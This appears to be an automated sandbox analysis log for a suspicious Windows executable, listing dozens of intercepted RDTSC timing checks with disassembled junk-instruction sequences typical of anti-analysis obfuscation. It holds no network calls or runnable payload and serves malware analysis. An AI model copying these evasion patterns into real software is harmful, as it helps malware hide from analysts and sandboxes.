Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1664411 second address: 166441C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F10C4818116h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166472C second address: 166474A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F10C4816DF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F10C4816E00h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166474A second address: 166474E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166474E second address: 1664754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16682E0 second address: 16682E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16682E6 second address: 16682F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816DFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16682F7 second address: 1668301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pushad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166A691 second address: 166A695 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166A353 second address: 166A357 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166A357 second address: 166A387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F10C4816DF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007F10C4816E14h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166A387 second address: 166A38D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166A38D second address: 166A391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166D4B4 second address: 166D4BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166D4BA second address: 166D4C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F10C4816DF6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166D4C5 second address: 166D4D4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F10C4818118h 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166CFED second address: 166CFFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 js 00007F10C4816DF6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166CFFC second address: 166D009 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F10C4818116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166D009 second address: 166D00F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166D25F second address: 166D263 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166D263 second address: 166D283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F10C4816E07h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166D283 second address: 166D287 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1670973 second address: 1670995 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 jc 00007F10C4816DF6h 0x0000000d popad 0x0000000e js 00007F10C4816DFCh 0x00000014 jno 00007F10C4816DF6h 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push ecx 0x0000001f pushad 0x00000020 popad 0x00000021 pop ecx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16759E8 second address: 16759EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16759EC second address: 16759F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F10C4816DF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16759F8 second address: 16759FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16759FE second address: 1675A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1674F00 second address: 1674F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1674F06 second address: 1674F0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16752BB second address: 16752C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16752C1 second address: 16752CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16752CA second address: 1675327 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F10C481811Bh 0x00000008 jmp 00007F10C4818128h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007F10C4818123h 0x00000016 pop eax 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a pushad 0x0000001b push edx 0x0000001c pop edx 0x0000001d jc 00007F10C4818116h 0x00000023 pushad 0x00000024 popad 0x00000025 je 00007F10C4818116h 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e ja 00007F10C4818116h 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1675327 second address: 167532B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1675499 second address: 16754A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jc 00007F10C4818116h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1679F8A second address: 1679F8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1679F8E second address: 1679F9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C481811Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1679F9C second address: 1679FAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F10C4816DF6h 0x0000000a jg 00007F10C4816DF6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 161FC8D second address: 161FC91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 161FC91 second address: 161FC97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 167A674 second address: 167A678 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 167A678 second address: 167A691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10C4816DFFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 167B00F second address: 167B018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 167B018 second address: 167B05C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816E02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F10C4816E07h 0x00000010 jmp 00007F10C4816E05h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 167B05C second address: 167B067 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F10C4818116h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16834F0 second address: 168351E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007F10C4816DFCh 0x0000000e push edi 0x0000000f jmp 00007F10C4816E05h 0x00000014 pop edi 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 168351E second address: 1683526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16815B5 second address: 16815D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10C4816E08h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1681A23 second address: 1681A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1681D27 second address: 1681D2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1682315 second address: 168231F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F10C4818116h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16825D8 second address: 16825E3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jp 00007F10C4816DF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1682B8B second address: 1682B92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1682B92 second address: 1682B97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16831BC second address: 16831C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16872CB second address: 16872D5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F10C4816DF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16872D5 second address: 16872E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F10C4818116h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16872E1 second address: 16872E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 168667F second address: 168669A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10C4818127h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 168669A second address: 168669E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 168669E second address: 16866AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F10C4818116h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16866AE second address: 16866B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F10C4816DF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1686C25 second address: 1686C42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4818126h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1686C42 second address: 1686C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1686DAF second address: 1686DE0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F10C4818116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b je 00007F10C4818116h 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 jnp 00007F10C4818122h 0x0000001c jo 00007F10C4818116h 0x00000022 jo 00007F10C4818116h 0x00000028 pushad 0x00000029 js 00007F10C4818116h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1686DE0 second address: 1686DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1686F6C second address: 1686F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1686F70 second address: 1686FA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F10C4816E03h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F10C4816E06h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16935A7 second address: 16935AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 169173A second address: 169173E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 169173E second address: 1691755 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4818123h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1691755 second address: 1691775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F10C4816E07h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16918D3 second address: 16918D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16918D7 second address: 16918E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16918E4 second address: 16918F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F10C4818116h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16918F0 second address: 16918FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F10C4816DF6h 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1691E8F second address: 1691E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1691E96 second address: 1691ECF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F10C4816DFEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F10C4816E04h 0x00000012 jmp 00007F10C4816E00h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16921AD second address: 16921B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16921B3 second address: 16921B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16921B8 second address: 16921C5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F10C4818118h 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1692302 second address: 169230B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1692617 second address: 1692625 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1691330 second address: 1691335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1691335 second address: 1691348 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F10C481811Dh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1691348 second address: 169134C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 169A489 second address: 169A4A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F10C4818122h 0x0000000a popad 0x0000000b push esi 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 169A73E second address: 169A744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 169A744 second address: 169A761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jp 00007F10C4818116h 0x0000000c ja 00007F10C4818116h 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jo 00007F10C4818116h 0x0000001b push edx 0x0000001c pop edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15D9286 second address: 15D92EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F10C4816E04h 0x00000013 jmp 00007F10C4816DFBh 0x00000018 jmp 00007F10C4816E09h 0x0000001d push esi 0x0000001e pop esi 0x0000001f popad 0x00000020 jnl 00007F10C4816E0Fh 0x00000026 jmp 00007F10C4816E07h 0x0000002b push edi 0x0000002c pop edi 0x0000002d rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 169BF77 second address: 169BF89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C481811Ch 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15E9F03 second address: 15E9F22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jbe 00007F10C4816DF8h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F10C4816DFDh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15E9F22 second address: 15E9F28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15E9F28 second address: 15E9F3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816DFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15DE410 second address: 15DE43D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4818124h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F10C4818125h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15DE43D second address: 15DE443 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16B3252 second address: 16B3283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F10C481811Dh 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F10C4818116h 0x00000012 jmp 00007F10C4818127h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16B3283 second address: 16B329F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F10C4816DF6h 0x00000008 jmp 00007F10C4816DFBh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16B2E0F second address: 16B2E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16B913B second address: 16B9140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
